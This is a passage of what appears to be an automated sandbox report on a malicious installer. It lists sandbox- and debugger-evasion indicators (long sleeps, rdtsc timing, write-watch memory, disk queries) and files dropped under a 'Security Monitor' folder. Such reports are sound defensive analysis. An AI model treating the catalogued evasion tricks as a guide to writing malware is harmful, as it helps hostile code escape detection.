Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found stalling execution ending in API Sleep call

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe

Stalling execution: Execution stalls by calling Sleep

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Memory allocated: 11B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Memory allocated: 2D20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Memory allocated: 2A90000 memory reserve \| memory write watch	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 53_2_033EB8B0 rdtsc

53_2_033EB8B0

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Thread delayed: delay time: 922337203685477

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5377	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4397	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Window / User API: threadDelayed 3826	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Window / User API: threadDelayed 5991	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6833	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2772	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7772
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1783
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8429
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1079
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7702
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1742
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5777
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3986
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7765
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1882
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6175
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3508
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8010
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1591
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7246
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2340
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8466
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 915
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5961
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3763

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ssleay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lame_enc.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-JF90R.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-IFJUI.tmp	Jump to dropped file
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{WCS1080F-FD66-4650-B1B8-C8310A1CE2D3}\ffws.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\WebBrowser.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-ASDJS.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-V94IU.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ff.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\_isetup\_iscrypt.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-P60MT.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-269PL.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-OO1B8.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\webbrowser.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\libeay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-ILFVG.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\_isetup\_isdecmp.dll	Jump to dropped file

Found evasive API chain (may stop execution after checking a module file name)

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

Found large amount of non-executed APIs

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe

API coverage: 7.7 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2640	Thread sleep count: 5377 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2640	Thread sleep count: 4397 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6092	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe TID: 6036	Thread sleep time: -31359464925306218s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe TID: 796	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6092	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7320	Thread sleep count: 6833 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7308	Thread sleep count: 2772 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7348	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7852	Thread sleep count: 7772 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7848	Thread sleep count: 1783 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7884	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2828	Thread sleep count: 8429 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5264	Thread sleep count: 1079 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7468	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524	Thread sleep count: 7702 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7520	Thread sleep count: 1742 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2084	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7620	Thread sleep count: 5777 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7620	Thread sleep count: 3986 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7656	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7700	Thread sleep count: 7765 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7704	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7692	Thread sleep count: 1882 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6832	Thread sleep count: 6175 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6628	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6868	Thread sleep count: 3508 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4336	Thread sleep count: 8010 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7764	Thread sleep count: 1591 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1244	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4996	Thread sleep count: 7246 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2336	Thread sleep count: 2340 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7820	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7800	Thread sleep count: 8466 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5228	Thread sleep count: 915 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4592	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7492	Thread sleep count: 5961 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7492	Thread sleep count: 3763 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5828	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe TID: 7036	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 5168	Thread sleep count: 126 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 5264	Thread sleep count: 44 > 30

Queries disk information (often used to detect virtual machines)

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Queries keyboard layouts

Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
